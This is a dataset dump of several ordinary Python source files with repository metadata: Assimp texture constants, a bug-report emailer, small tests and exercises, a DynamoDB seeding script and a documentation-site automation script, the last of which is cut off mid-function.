Dataset schema (one row per source file; ⌀ marks a nullable column):

| Column | Type | Range / classes |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 6 to 782k |
| ext | string | 7 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4 to 237 |
| max_stars_repo_name | string | length 6 to 72 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | |
| max_stars_count | int64 | 1 to 53k ⌀ |
| max_stars_repo_stars_event_min_datetime | string | length 24 ⌀ |
| max_stars_repo_stars_event_max_datetime | string | length 24 ⌀ |
| max_issues_repo_path | string | length 4 to 184 |
| max_issues_repo_name | string | length 6 to 72 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | |
| max_issues_count | int64 | 1 to 27.1k ⌀ |
| max_issues_repo_issues_event_min_datetime | string | length 24 ⌀ |
| max_issues_repo_issues_event_max_datetime | string | length 24 ⌀ |
| max_forks_repo_path | string | length 4 to 184 |
| max_forks_repo_name | string | length 6 to 72 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | |
| max_forks_count | int64 | 1 to 12.2k ⌀ |
| max_forks_repo_forks_event_min_datetime | string | length 24 ⌀ |
| max_forks_repo_forks_event_max_datetime | string | length 24 ⌀ |
| content | string | length 6 to 782k |
| avg_line_length | float64 | 2.75 to 664k |
| max_line_length | int64 | 5 to 782k |
| alphanum_fraction | float64 | 0 to 1 |
hexsha: 97b143a625ae8a0523c3e9e9d1962c33d36209c6 | size: 2,445 | ext: py | lang: Python
path: external/Assimp/port/PyAssimp/pyassimp/material.py | repo: IKholopov/TierGine @ 1a3c7cd2bed460af672d7cd5c33d7e7863043989 | licenses: ["Apache-2.0"]
stars: 36 (2017-03-27T16:57:47.000Z to 2022-01-12T04:17:55.000Z) | issues: 56 (2019-01-31T19:57:09.000Z to 2019-08-11T17:09:16.000Z) | forks: 24 (2019-01-14T23:05:04.000Z to 2020-03-24T13:35:27.000Z)
## <hr>Dummy value.
#
# No texture, but the value to be used as 'texture semantic'
# (#aiMaterialProperty::mSemantic) for all material properties
# *not* related to textures.
#
aiTextureType_NONE = 0x0
## <hr>The texture is combined with the result of the diffuse
# lighting equation.
#
aiTextureType_DIFFUSE = 0x1
## <hr>The texture is combined with the result of the specular
# lighting equation.
#
aiTextureType_SPECULAR = 0x2
## <hr>The texture is combined with the result of the ambient
# lighting equation.
#
aiTextureType_AMBIENT = 0x3
## <hr>The texture is added to the result of the lighting
# calculation. It isn't influenced by incoming light.
#
aiTextureType_EMISSIVE = 0x4
## <hr>The texture is a height map.
#
# By convention, higher gray-scale values stand for
# higher elevations from the base height.
#
aiTextureType_HEIGHT = 0x5
## <hr>The texture is a (tangent space) normal-map.
#
# Again, there are several conventions for tangent-space
# normal maps. Assimp does (intentionally) not
# distinguish here.
#
aiTextureType_NORMALS = 0x6
## <hr>The texture defines the glossiness of the material.
#
# The glossiness is in fact the exponent of the specular
# (phong) lighting equation. Usually there is a conversion
# function defined to map the linear color values in the
# texture to a suitable exponent. Have fun.
#
aiTextureType_SHININESS = 0x7
## <hr>The texture defines per-pixel opacity.
#
# Usually 'white' means opaque and 'black' means
# 'transparency'. Or quite the opposite. Have fun.
#
aiTextureType_OPACITY = 0x8
## <hr>Displacement texture
#
# The exact purpose and format is application-dependent.
# Higher color values stand for higher vertex displacements.
#
aiTextureType_DISPLACEMENT = 0x9
## <hr>Lightmap texture (aka Ambient Occlusion)
#
# Both 'Lightmaps' and dedicated 'ambient occlusion maps' are
# covered by this material property. The texture contains a
# scaling value for the final color value of a pixel. Its
# intensity is not affected by incoming light.
#
aiTextureType_LIGHTMAP = 0xA
## <hr>Reflection texture
#
#Contains the color of a perfect mirror reflection.
#Rarely used, almost never for real-time applications.
#
aiTextureType_REFLECTION = 0xB
## <hr>Unknown texture
#
# A texture reference that does not match any of the definitions
# above is considered to be 'unknown'. It is still imported
# but is excluded from any further postprocessing.
#
aiTextureType_UNKNOWN = 0xC
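# --- Illustrative helper (not part of the original module) ---
# The constants above are plain integers, so a reverse lookup table is
# convenient when debugging which 'texture semantic' a material property
# carries. The names below are hypothetical additions, shown as a sketch.
_TEXTURE_TYPE_NAMES = {
    aiTextureType_NONE: "NONE",
    aiTextureType_DIFFUSE: "DIFFUSE",
    aiTextureType_SPECULAR: "SPECULAR",
    aiTextureType_AMBIENT: "AMBIENT",
    aiTextureType_EMISSIVE: "EMISSIVE",
    aiTextureType_HEIGHT: "HEIGHT",
    aiTextureType_NORMALS: "NORMALS",
    aiTextureType_SHININESS: "SHININESS",
    aiTextureType_OPACITY: "OPACITY",
    aiTextureType_DISPLACEMENT: "DISPLACEMENT",
    aiTextureType_LIGHTMAP: "LIGHTMAP",
    aiTextureType_REFLECTION: "REFLECTION",
}

def texture_type_name(semantic):
    """Return a readable name for an aiTextureType_* code, e.g. 0x1 -> 'DIFFUSE'."""
    return _TEXTURE_TYPE_NAMES.get(semantic, "UNKNOWN")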
avg_line_length: 27.166667 | max_line_length: 64 | alphanum_fraction: 0.762781
hexsha: e7df70c258915d7e843436756251798bf210779e | size: 5,689 | ext: py | lang: Python
path: BugTracker-main/sendmail.py | repo: Zusyaku/Termux-And-Lali-Linux-V2 @ b1a1b0841d22d4bf2cc7932b72716d55f070871e | licenses: ["Apache-2.0"]
stars: 2 (2021-11-17T03:35:03.000Z to 2021-12-08T06:00:31.000Z) | issues: null | forks: 2 (2021-11-05T18:07:48.000Z to 2022-02-24T21:25:07.000Z)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from config import app
# Sending confirmation email to the reporter
class ReporterSendMail:
def __init__(self, recipient_email, system, severity, steps, message):
# Email and password for your SMTP server
email = app.config['SMTP_EMAIL']
password = app.config['SMTP_PASSWORD']
subject = 'Thanks for reporting the bug'
        # The email is composed in both HTML and plain text for broad client compatibility
messageHTML = f'<table style="height: 40px; border-color: black; margin-left: auto; margin-right: auto;" width="1109"><tbody><tr><td style="width: 1099px; text-align: center;"><h1>Thanks for reporting the bug</h1></td></tr></tbody></table><h2> </h2><h2>Summary of your report:</h2><table style="height: 196px; width: 927px; border-color: black; margin-left: auto; margin-right: auto;"><tbody><tr style="height: 30px;"><td style="height: 30px;"><div><h3>System</h3></div></td><td style="width: 212.133px; height: 30px;"><h3> {system}</h3></td></tr><tr style="height: 27px;"><td style="width: 226.867px; height: 27px;"><div><h3>Severity</h3></div></td><td style="width: 212.133px; height: 27px;"><h3> {severity}</h3></td></tr><tr style="height: 122.433px;"><td style="width: 226.867px; height: 122.433px;"><div><h3>Steps to reproduce</h3></div></td><td style="width: 212.133px; height: 122.433px;"><h3> {steps}</h3></td></tr><tr style="height: 98px;"><td style="width: 226.867px; height: 98px;"><h3>Message</h3></td><td style="width: 212.133px; height: 98px;"><h3> {message}</h3></td></tr></tbody></table><p> </p>'
messagePlain = f"Thanks for reporting the bug\nSummary of your report:\nSystem {system}\nSeverity {severity}\nSteps to reproduce {steps}\nMessage {message}\nPlease enable HTML to see the styled message."
        # Build a multipart/alternative MIME message so clients use the HTML part when they can
msg = MIMEMultipart('alternative')
# Defining email, recipient email and subject for the MIME module
msg['From'] = email
msg['To'] = recipient_email
msg['Subject'] = subject
# Then we attach our message both in plain text and html
msg.attach(MIMEText(messagePlain, 'plain'))
msg.attach(MIMEText(messageHTML, 'html'))
        # Define the SMTP server (with Gmail you may need to allow "less secure apps")
        server = smtplib.SMTP(app.config['SMTP_HOST'], app.config['SMTP_PORT'])
        # Start a TLS-secured connection and log in
        server.starttls()
        server.login(email, password)
        # Turn the MIME message into a string, send the email, then close the connection
text = msg.as_string()
server.sendmail(email, recipient_email, text)
server.quit()
class AdminSendMail:
def __init__(self, recipient_email, system, severity, steps, message):
# Email and password for your SMTP server
email = app.config['SMTP_EMAIL']
password = app.config['SMTP_PASSWORD']
subject = 'A new bug has been reported'
        # The email is composed in both HTML and plain text for broad client compatibility
        messageHTML = f'<table style="height: 40px; border-color: black; margin-left: auto; margin-right: auto;" width="1109"><tbody><tr><td style="width: 1099px; text-align: center;"><h1>A new bug has been reported</h1></td></tr></tbody></table><h2> </h2><h2>Summary of the report:</h2><table style="height: 196px; width: 927px; border-color: black; margin-left: auto; margin-right: auto;"><tbody><tr style="height: 30px;"><td style="height: 30px;"><div><h3>System</h3></div></td><td style="width: 212.133px; height: 30px;"><h3> {system}</h3></td></tr><tr style="height: 27px;"><td style="width: 226.867px; height: 27px;"><div><h3>Severity</h3></div></td><td style="width: 212.133px; height: 27px;"><h3> {severity}</h3></td></tr><tr style="height: 122.433px;"><td style="width: 226.867px; height: 122.433px;"><div><h3>Steps to reproduce</h3></div></td><td style="width: 212.133px; height: 122.433px;"><h3> {steps}</h3></td></tr><tr style="height: 98px;"><td style="width: 226.867px; height: 98px;"><h3>Message</h3></td><td style="width: 212.133px; height: 98px;"><h3> {message}</h3></td></tr></tbody></table><p> </p>'
        messagePlain = f"A new bug has been reported\nSummary of the report:\nSystem {system}\nSeverity {severity}\nSteps to reproduce {steps}\nMessage {message}\nPlease enable HTML to see the styled message."
        # Build a multipart/alternative MIME message so clients use the HTML part when they can
msg = MIMEMultipart('alternative')
# Defining email, recipient email and subject for the MIME module
msg['From'] = email
msg['To'] = app.config['ADMIN_EMAIL']
msg['Subject'] = subject
# Then we attach our message both in plain text and html
msg.attach(MIMEText(messagePlain, 'plain'))
msg.attach(MIMEText(messageHTML, 'html'))
        # Define the SMTP server (with Gmail you may need to allow "less secure apps")
        server = smtplib.SMTP(app.config['SMTP_HOST'], app.config['SMTP_PORT'])
        # Start a TLS-secured connection and log in
        server.starttls()
        server.login(email, password)
        # Turn the MIME message into a string, send the email, then close the connection
text = msg.as_string()
server.sendmail(email, app.config['ADMIN_EMAIL'], text)
server.quit()
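# Illustrative usage (values are placeholders; assumes SMTP_EMAIL, SMTP_PASSWORD,
# SMTP_HOST, SMTP_PORT and ADMIN_EMAIL are set in app.config). Note the design
# choice here: all the work happens in __init__, so merely instantiating either
# class sends the email immediately.
#
#   ReporterSendMail("reporter@example.com", "backend", "high",
#                    "1. log in 2. submit the form", "App crashes on submit")
#   AdminSendMail("reporter@example.com", "backend", "high",
#                 "1. log in 2. submit the form", "App crashes on submit")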
avg_line_length: 87.523077 | max_line_length: 1,150 | alphanum_fraction: 0.675163
hexsha: 821f97a61aa7a46e2b10c705af230637a92179e0 | size: 876 | ext: py | lang: Python
path: 2-resources/_External-learning-resources/02-pyth/python-patterns-master/tests/behavioral/test_observer.py | repo: eengineergz/Lambda @ 1fe511f7ef550aed998b75c18a432abf6ab41c5f | licenses: ["MIT"]
stars: null | issues: null | forks: 1 (2021-11-05T07:48:26.000Z to 2021-11-05T07:48:26.000Z)
from unittest.mock import Mock, patch
import pytest
from patterns.behavioral.observer import Data, DecimalViewer, HexViewer
@pytest.fixture
def observable():
return Data("some data")
def test_attach_detach(observable):
decimal_viewer = DecimalViewer()
assert len(observable._observers) == 0
observable.attach(decimal_viewer)
assert decimal_viewer in observable._observers
observable.detach(decimal_viewer)
assert decimal_viewer not in observable._observers
def test_one_data_change_notifies_each_observer_once(observable):
observable.attach(DecimalViewer())
observable.attach(HexViewer())
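    # Note: patch() replaces DecimalViewer.update on the class itself, so the
    # instance attached above picks up the mock through normal attribute lookup.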
with patch(
"patterns.behavioral.observer.DecimalViewer.update", new_callable=Mock()
) as mocked_update:
assert mocked_update.call_count == 0
observable.data = 10
assert mocked_update.call_count == 1
avg_line_length: 25.764706 | max_line_length: 80 | alphanum_fraction: 0.753425
hexsha: 417fc976e5fb277b2cbdaf4bddd58babbd7ec570 | size: 1,293 | ext: py | lang: Python
path: 数据结构/NowCode/12_FindKthToTail.py | repo: Blankwhiter/LearningNotes @ 83e570bf386a8e2b5aa699c3d38b83e5dcdd9cb0 | licenses: ["MIT"]
stars: null | issues: 3 (2020-08-14T07:50:27.000Z to 2020-08-14T08:51:06.000Z) | forks: 2 (2021-03-14T05:58:45.000Z to 2021-08-29T17:25:52.000Z)
# The k-th node from the end of a linked list
# Given a linked list, return the k-th node counting from the end.
# Linked-list node
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
# Print the list
def printChain(head):
node = head
while node:
print(node.val)
node = node.next
class Solution:
    def FindKthToTail(self, head, k):
        if k <= 0 or head is None:
            return None
        node = head
        nodes = []
        while node:
            nodes.append(node)
            node = node.next
        # k is larger than the length of the list
        if k > len(nodes):
            return None
        return nodes[len(nodes) - k]
    def FindKthToTail2(self, head, k):
        if k <= 0 or head is None:
            return None
        first = head
        second = head
        # Advance the first pointer k steps ahead
        for i in range(0, k):
            if first is None:
                return None
            first = first.next
        # Move both pointers together; keeping a gap of k means that when
        # `first` runs off the end, `second` is the k-th node from the end.
        while first:
            first = first.next
            second = second.next
        return second
if __name__ == '__main__':
    # Build the list 1 -> 2 -> 3 -> 4 -> 5
l1 = ListNode(1)
l2 = ListNode(2)
l3 = ListNode(3)
l4 = ListNode(4)
l5 = ListNode(5)
l1.next = l2
l2.next = l3
l3.next = l4
l4.next = l5
print(Solution().FindKthToTail2(l1, 1))
avg_line_length: 20.203125 | max_line_length: 49 | alphanum_fraction: 0.501933
hexsha: 68fce63461c016416b598b5a35d6b356fdb5d81e | size: 2,294 | ext: py | lang: Python
path: 2016/day01_no_time_for_a_taxicab/python/src/part2.py | repo: tlake/advent-of-code @ 17c729af2af5f1d95ba6ff68771a82ca6d00b05d | licenses: ["MIT"]
stars: null | issues: null | forks: null
#!/usr/bin/env python
"""Find shortest taxicab distance."""
import re
from common import get_input
class Walker(object):
"""Class for turning walking directions into distance from start."""
def __init__(self, input_string):
"""Initialize."""
self.directions = self._listify_input(input_string.lower())
self.steps = [0, 0, 0, 0]
self.facing = 0
self.locations = [(0, 0)]
self.new_loc = (0, 0)
def _listify_input(self, input_string):
"""Turn a string of inputs into a list."""
stripped_string = re.sub(r'\s+', '', input_string.strip())
split_list = stripped_string.split(",")
return [(x[0], int(x[1::])) for x in split_list]
def make_rotation(self, rotation):
"""Turn left or right, and update self.facing."""
if rotation == "r":
self.facing += 1
else:
self.facing -= 1
if self.facing > 3:
self.facing = self.facing - 4
elif self.facing < 0:
self.facing = self.facing + 4
def take_step(self):
"""Move [steps] forward and update coordinates."""
if self.facing == 0:
self.new_loc = (self.new_loc[0], self.new_loc[1] + 1)
elif self.facing == 1:
self.new_loc = (self.new_loc[0] + 1, self.new_loc[1])
elif self.facing == 2:
self.new_loc = (self.new_loc[0], self.new_loc[1] - 1)
else:
self.new_loc = (self.new_loc[0] - 1, self.new_loc[1])
def travel(self, steps):
"""."""
step = 1
while step <= steps:
self.take_step()
if self.new_loc in self.locations:
return True
else:
self.locations.append(self.new_loc)
step += 1
return False
def run(self):
"""Step through the directions list and return the distance."""
for direction in self.directions:
rotation = direction[0]
steps = direction[1]
self.make_rotation(rotation)
hq_found = self.travel(steps)
if hq_found:
                return abs(self.new_loc[0]) + abs(self.new_loc[1])
if __name__ == "__main__":
walker = Walker(get_input())
print(walker.run())
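    # Sanity check from the puzzle statement (AoC 2016 Day 1, part 2):
    # following "R8, R4, R4, R8", the first location visited twice is
    # 4 blocks away.
    assert Walker("R8, R4, R4, R8").run() == 4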
avg_line_length: 29.037975 | max_line_length: 72 | alphanum_fraction: 0.547079
hexsha: d475380cb190a0eb870c03d1764b5d95f3892d0e | size: 3,591 | ext: py | lang: Python
path: 2-resources/__CHEAT-SHEETS/cheatsheets-master/cheatsheets-master/dynamodb/python/script.py | repo: eengineergz/Lambda @ 1fe511f7ef550aed998b75c18a432abf6ab41c5f | licenses: ["MIT"]
stars: 103 (2019-08-30T10:04:40.000Z to 2022-03-30T22:14:44.000Z) | issues: 6 (2021-04-08T08:36:27.000Z to 2021-10-01T07:47:17.000Z) | forks: 51 (2019-06-10T06:11:46.000Z to 2022-03-30T16:33:05.000Z)
import boto3
import time
import random
import datetime
client = boto3.Session(region_name='eu-west-1').client('dynamodb', aws_access_key_id='', aws_secret_access_key='', endpoint_url='http://localhost:4567')
userlists = {}
userlists['john'] = {'id':'johnsnow9801', 'firstname': 'john', 'age': '23', 'location': 'south africa', 'rank': 'professional'}
userlists['max'] = {'id':'maxmilia', 'firstname': 'max', 'age': '24', 'location': 'new zealand', 'rank': 'professional'}
userlists['samantha'] = {'id':'sambubbles8343', 'firstname': 'samantha', 'age': '21', 'location': 'australia', 'rank': 'professional'}
userlists['aubrey'] = {'id':'aubreyxeleven4712', 'firstname': 'aubrey', 'age': '24', 'location': 'america', 'rank': 'professional'}
userlists['mikhayla'] = {'id':'mikkie1419', 'firstname': 'mikhayla', 'age': '21', 'location': 'mexico', 'rank': 'professional'}
userlists['steve'] = {'id':'stevie1119', 'firstname': 'steve', 'age': '25', 'location': 'ireland', 'rank': 'professional'}
userlists['rick'] = {'id':'rickmax0901', 'firstname': 'rick', 'age': '20', 'location': 'sweden', 'rank': 'professional'}
userlists['michael'] = {'id':'mikeshank2849', 'firstname': 'michael', 'age': '26', 'location': 'america', 'rank': 'professional'}
userlists['paul'] = {'id':'paulgru2039', 'firstname': 'paul', 'age': '26', 'location': 'sweden', 'rank': 'professional'}
userlists['nathalie'] = {'id':'natscotia2309', 'firstname': 'nathalie', 'age': '21', 'location': 'america', 'rank': 'professional'}
userlists['scott'] = {'id':'scottie2379', 'firstname': 'scott', 'age': '23', 'location': 'new zealand', 'rank': 'professional'}
userlists['will'] = {'id':'wilson9335', 'firstname': 'will', 'age': '27', 'location': 'sweden', 'rank': 'professional'}
userlists['adrian'] = {'id':'adriano5519', 'firstname': 'adrian', 'age': '22', 'location': 'ireland', 'rank': 'professional'}
userlists['julian'] = {'id':'jules8756', 'firstname': 'julian', 'age': '27', 'location': 'mexico', 'rank': 'professional'}
userlists['rico'] = {'id':'ricololo4981', 'firstname': 'rico', 'age': '20', 'location': 'sweden', 'rank': 'professional'}
userlists['kate'] = {'id':'kitkatkate0189', 'firstname': 'kate', 'age': '24', 'location': 'south africa', 'rank': 'professional'}
events = [
{
'name': 'gaming_nationals_round_01',
'game': 'counter_strike'
},
{
'name': 'gaming_nationals_round_02',
'game': 'fifa'
},
{
'name': 'gaming_nationals_round_03',
'game': 'rocket_league'
},
{
'name': 'gaming_nationals_round_04',
'game': 'world_of_warcraft'
},
{
'name': 'gaming_nationals_round_05',
'game': 'pubg'
},
{
'name': 'gaming_nationals_round_06',
'game': 'league_of_legends'
},
{
'name': 'gaming_nationals_round_07',
'game': 'dota'
}
]
users = userlists.keys()
def generate(name, eventname):
item = {
'event': {'S': eventname['name']},
'timestamp': {'S': datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M")},
'gamerid': {'S': name['id']},
'name': {'S': name['firstname']},
'age': {'N': str(name['age'])},
'location': {'S': name['location']},
'game': {'S': eventname['game']},
'score': {'N': str(random.randint(10000, 19999))},
'rank': {'S': name['rank']}}
return item
for eventname in events:
for user in users:
item = generate(userlists[user], eventname)
print("Event: {} - submitting scores to dynamodb for {}".format(item['event']['S'], user))
response = client.put_item(TableName='gamescores', Item=item)
    time.sleep(300)  # pause 5 minutes before submitting the next event's scores
print("")
print("done")
avg_line_length: 43.792683 | max_line_length: 152 | alphanum_fraction: 0.614314
hexsha: 2b4bcac9adf6cddccee381cf59c2e64ef6dd93fc | size: 584 | ext: py | lang: Python
path: code/Dictionaries.py | repo: ju1-eu/pyAnfaenger @ 59440e99d69582ee2c7a022c8b819e7c78f41ac0 | licenses: ["MIT"]
stars: null | issues: null | forks: null
# List
names = ["Ben", "Jan", "Peter", "Melissa"]
noten = [1, 2, 1, 4]
# dict {(key, value)}
names_and_noten = {"Ben": 1, "Jan": 2, "Peter": 1, "Melissa": 4}
# Add a value
names_and_noten.update({"Pia": 3})
# or
names_and_noten["Julia"] = 1
# Remove a value
names_and_noten.pop("Julia")
# Keys
for k in names_and_noten.keys():
print(k)
# Values
for v in names_and_noten.values():
print(v)
# Keys and values
for k, v in names_and_noten.items():
print(k, v)
# Is the key present?
if "Julia" in names_and_noten:
present = True
else:
present = False
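# The if/else above can be written as a single expression; this line is
# equivalent and more idiomatic:
present = "Julia" in names_and_noten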
avg_line_length: 19.466667 | max_line_length: 64 | alphanum_fraction: 0.64726
hexsha: 5aa325525b7c0bda7b96ce01496d99f232ccd463 | size: 2,554 | ext: py | lang: Python
path: 2016/day04_security_through_obscurity/python/src/test_solutions.py | repo: tlake/advent-of-code @ 17c729af2af5f1d95ba6ff68771a82ca6d00b05d | licenses: ["MIT"]
stars: null | issues: null | forks: null
"""."""
import pytest
from solution1 import RoomAnalyzer as ra1
from solution2 import RoomAnalyzer as ra2
class TestPart1UnitTests:
"""."""
@pytest.mark.parametrize("test_input, expected", [
("aaaaa-bbb-z-y-x-123[abxyz]", ("aaaaabbbzyx", 123, "abxyz")),
("a-b-c-d-e-f-g-h-987[abcde]", ("abcdefgh", 987, "abcde")),
("not-a-real-room-404[oarel]", ("notarealroom", 404, "oarel")),
("totally-real-room-200[decoy]", ("totallyrealroom", 200, "decoy"))
])
def test_process_room_string(self, test_input, expected):
"""."""
analyzer = ra1()
assert(analyzer.process_room_string(test_input) == expected)
@pytest.mark.parametrize("test_input, expected", [
("aaaaa-bbb-z-y-x-123[abxyz]", True),
("a-b-c-d-e-f-g-h-987[abcde]", True),
("not-a-real-room-404[oarel]", True),
("totally-real-room-200[decoy]", False)
])
def test_room_is_real(self, test_input, expected):
"""."""
analyzer = ra1()
name, _, checksum = analyzer.process_room_string(test_input)
assert(analyzer.room_is_real(name, checksum) == expected)
@pytest.mark.parametrize("test_input, expected", [
("aaaaa-bbb-z-y-x-123[abxyz]", 123),
("a-b-c-d-e-f-g-h-987[abcde]", 987),
("not-a-real-room-404[oarel]", 404),
("totally-real-room-200[decoy]", 0)
])
def test_analyze_room(self, test_input, expected):
"""."""
analyzer = ra1()
assert(analyzer.analyze_room(test_input) == expected)
def test_analyze_input(self):
"""."""
test_input = [
"aaaaa-bbb-z-y-x-123[abxyz]",
"a-b-c-d-e-f-g-h-987[abcde]",
"not-a-real-room-404[oarel]",
"totally-real-room-200[decoy]",
]
expected = 1514
analyzer = ra1(test_input)
assert(analyzer.analyze_input() == expected)
class TestPart2UnitTests:
"""."""
@pytest.mark.parametrize("test_input, expected", [
(('a', 2), 'c'),
(('a', 25), 'z'),
(('a', 26), 'a'),
(('z', 2), 'b'),
(('a', 53), 'b'),
((' ', 2), ' ')
])
def test__shift(self, test_input, expected):
"""."""
analyzer = ra2()
assert(analyzer._shift(test_input) == expected)
def test_decipher(self):
"""."""
test_input = ("qzmt zixmtkozy ivhz", 343)
expected = "very encrypted name"
analyzer = ra2()
assert(analyzer.decipher(test_input[0], test_input[1]) == expected)
avg_line_length: 31.925 | max_line_length: 75 | alphanum_fraction: 0.550117
hexsha: 5ab17da7bc5572c55edd0f9d96682a83df68d6a3 | size: 31,731 | ext: py | lang: Python
path: _scripts/automate.py | repo: sakshamtaneja21/help.jabref.org @ 98fba5fa4a774c38b34f354b42329df75ce8e2de | licenses: ["CC-BY-4.0"]
stars: null | issues: null | forks: 1 (2019-10-20T06:48:18.000Z to 2019-10-20T06:48:18.000Z)
from __future__ import print_function
import argparse
import codecs
import datetime
import json
import os
import subprocess
from os import listdir
from os.path import isfile, join, isdir
import logger
try:
import frontmatter
except ImportError:
logger.error("The 'python-frontmatter' package is not available\n" +
"Install it with 'pip install python-frontmatter'")
quit()
COMMAND_STATUS = "status"
COMMAND_UPDATE = "update"
COMMAND_CLEAN = "clean"
COMMAND_REMOVE_SUFFIX = "removeHelpSuffix"
MAIN_LANGUAGE = "en"
FRONTMATTER_CATEGORIES = "helpCategories"
FRONTMATTER_TITLE = "title"
FRONTMATTER_OUTDATED = "outdated"
FILE_CATEGORIES_ORDER = "_scripts/categories.json"
FILE_STATUS = "status.md"
def get_language_file_path(language):
"""
:param language: string
:return: string: path to where the language file lies
"""
return "{lang}/localization_{lang}.json".format(lang=language)
def read_file(filename, encoding="UTF-8"):
"""
:param filename: string
    :param encoding: string: the encoding of the file to read (standard: `UTF-8`)
:return: list of strings: the lines of the file
"""
f1 = codecs.open(filename, encoding=encoding)
lines = f1.read()
f1.close()
return lines
def write_file(filename, content):
"""
writes the lines to the file in `UTF-8`
:param filename: string
:param content: list: the lines to write
"""
codecs.open(filename, "w", encoding='utf-8').writelines(content)
def get_local_file_path(language, page):
"""
:param language: string
:param page: string
:return: String: path without '/' at the beginning
"""
return "{lang}/{page}".format(lang=language, page=page)
def get_relative_file_link(language, page):
"""
:param language: string
:param page: string
:return: String: path with '/' at the beginning, but without '.md' at the end
"""
# remove .md at the end
return "/{lang}/{page}".format(lang=language, page=page)[:-3]
def get_file_link(language, page):
"""
:param language: string
:param page: string
:return: string: link directly to the github page
"""
filepath = get_local_file_path(language=language, page=page)
return "https://github.com/JabRef/help.jabref.org/blob/gh-pages/{file}".format(file=filepath)
def get_current_branch():
"""
:return: string: the current git branch
"""
return subprocess.check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD']).strip("\n")
def get_current_hash_short():
"""
:return: string: the current git hash (short)
"""
return subprocess.check_output(['git', 'rev-parse', '--short', 'HEAD']).strip("\n")
def get_other_languages():
"""
:return: list of strings: all but the main language
"""
return [f for f in listdir(".") if
isdir(join(".", f)) and not f.startswith("_") and not f.startswith(".") and not f.startswith("css") and not f.startswith(MAIN_LANGUAGE)]
def get_all_languages():
"""
:return: list: of strings all languages with the main language at the beginning
"""
languages = get_other_languages()
languages.insert(0, MAIN_LANGUAGE)
return languages
def get_help_pages_in(language):
"""
:param language: string
:return: list of strings: all help pages (including redirecting pages)
"""
return [f for f in listdir(language) if isfile(join(language, f)) and f.endswith(".md") and not f == "index.md"]
def get_categories_order():
"""
:return: list of strings and lists: the category order
"""
return json.loads(read_file(FILE_CATEGORIES_ORDER))
def get_include_page_path_to_main(language):
return "_includes/link-to-main-{}.html".format(language)
def get_include_page_path_to_toc(language):
return "_includes/link-to-toc-{}.html".format(language)
def does_category_exist(key):
"""
Checks if the key is in the main language file
:param key: string
:return: boolean
"""
file_path = get_language_file_path(language=MAIN_LANGUAGE)
try:
return key in json.loads(read_file(file_path))
except IOError:
logger.error("Cannot find main language file '{}'".format(MAIN_LANGUAGE))
except ValueError:
logger.error("Main language file is no valid json file '{}'".format(MAIN_LANGUAGE))
except KeyError:
logger.error("Language '{lang}' has no key '{key}'".format(lang=MAIN_LANGUAGE, key=key))
return False
def get_localization(language, key):
"""
:param language: string
:param key: string
:return: String: the localization or key if you cannot find the localization
"""
file_path = get_language_file_path(language=language)
try:
translation = json.loads(read_file(file_path))[key]
if not translation:
logger.error("Language file '{lang}' has an empty key '{key}'".format(lang=language, key=key))
else:
return translation
except IOError:
logger.error("Cannot find language file '{}'".format(language))
except ValueError:
logger.error("Language file is no valid json file '{}'".format(language))
except KeyError:
logger.error("Language '{lang}' has no key '{key}'".format(lang=language, key=key))
return key
def get_redirect_page_content(language, page):
"""
:param language: string
:param page: string
:return: string: the formatted frontmatter of a redirecting page
"""
return """---
redirect: {path}
layout: redirect
---
""".format(path=get_relative_file_link(language=language, page=page))
def get_index_header(title, more_questions, forum):
"""
:param title: string
:param more_questions: string
:param forum: string
:return: string: the formatted frontmatter + forum link of an index page
"""
return u"""---
title: {title}
---
# {title}
<div class="panel panel-info">
<div class="panel-heading">
<strong>{more_questions}</strong>
</div>
<div class="panel-body">
<a class="btn btn-default" role="button" href="http://discourse.jabref.org">{forum}</a>
</div>
</div>\n\n""".format(title=title, more_questions=more_questions, forum=forum)
def is_redirect_page(language, page):
"""
:param language: string
:param page: string
:return: boolean: True if this page is redirected to the main language one
"""
with open(get_local_file_path(language=language, page=page)) as yaml_page:
post = frontmatter.load(yaml_page)
redirect_layout = post["layout"] == "redirect" if "layout" in post.keys() else False
link = get_relative_file_link(language=MAIN_LANGUAGE, page=page)
redirect_link = post["redirect"] == link if "redirect" in post.keys() else False
return redirect_layout and redirect_link and not post.content
def is_old_help_page_redirecting_to_new_one(language, page):
"""
:param language: string
:param page: string
:return: boolean True if this help page was renamed and is redirecting to the new one
"""
with open(get_local_file_path(language=language, page=page)) as yaml_page:
post = frontmatter.load(yaml_page)
redirect_layout = post["layout"] == "redirect" if "layout" in post.keys() else False
redirect_not_to_en = post["redirect"].startswith("/{}/".format(language)) if "redirect" in post.keys() else False
return redirect_layout and redirect_not_to_en and not post.content
def create_redirect_page(language, page):
"""
creates a page which redirects to the main language one
:param language: string
:param page: string
"""
path = get_local_file_path(language=language, page=page)
if is_old_help_page_redirecting_to_new_one(language=MAIN_LANGUAGE, page=page):
with open(get_local_file_path(language=MAIN_LANGUAGE, page=page)) as yaml_page:
post = frontmatter.load(yaml_page)
new_page = post["redirect"].replace("/{}/".format(MAIN_LANGUAGE), "", 1) + ".md"
write_file(filename=path, content=get_redirect_page_content(language=language, page=new_page))
else:
write_file(filename=path, content=get_redirect_page_content(language=MAIN_LANGUAGE, page=page))
def delete_redirecting_help_pages(language):
"""
:param language: string
:return: list of strings: deletes all pages which redirects to the page in the main language and returns their names
"""
deleted_pages = []
for page in get_help_pages_in(language=language):
if is_redirect_page(language=language, page=page) or is_old_help_page_redirecting_to_new_one(language=language, page=page):
deleted_pages.append(page)
os.remove(get_local_file_path(language=language, page=page))
return deleted_pages
def delete_all_generated_redirecting_pages(extended):
"""
deletes all the generated pages (inlcuding status.md)
:param extended: if True then the deleted pages will be printed
"""
for language in get_all_languages():
deleted_pages = []
include_page_path_to_main = get_include_page_path_to_main(language=language)
if os.path.isfile(include_page_path_to_main):
os.remove(include_page_path_to_main)
deleted_pages.append(include_page_path_to_main)
include_page_path_to_toc = get_include_page_path_to_toc(language=language)
if os.path.isfile(include_page_path_to_toc):
os.remove(include_page_path_to_toc)
deleted_pages.append(include_page_path_to_toc)
